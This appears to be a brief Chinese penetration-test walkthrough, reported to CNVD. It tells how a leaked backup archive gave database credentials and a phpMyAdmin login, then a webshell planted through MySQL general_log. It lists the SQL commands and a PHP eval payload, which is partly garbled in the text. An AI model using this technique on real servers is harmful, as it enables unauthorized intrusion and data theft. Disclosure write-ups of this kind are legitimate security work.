1、被测网站
2、使用cmd命令查询该网站ip地址,
3、使用ip直接访问,改地址可直接下载文件(猜测应该是配置失误导致)
4、发现该目录下有备份文件xxx.rar下载该文件
5、找到文件中的敏感文件
6、里面有数据库账号密码;
7、因为是php搭建有phpmyadmin使用phpmyadmin登陆
8、直接使用sql写入getshell
9、通过写入日志文件getshell
10、读写权限+web绝对路径,修改日志文件为webshell
具体利用方法如下:
(1) 开启日志记录:
set global general_log = "ON";
(2) 查看当前的日志目录:
show variables like 'general%';
(3) 指定日志文件(目录结构可以直接访问phpinfo)
set global general_log_file = "C:/phpStudy/WWW/404.php";
(4)写入执行代码:
select "<?php [email protected]$_POST['b'];eval('$string');?>";
最后getshell连接
已上传到CNVD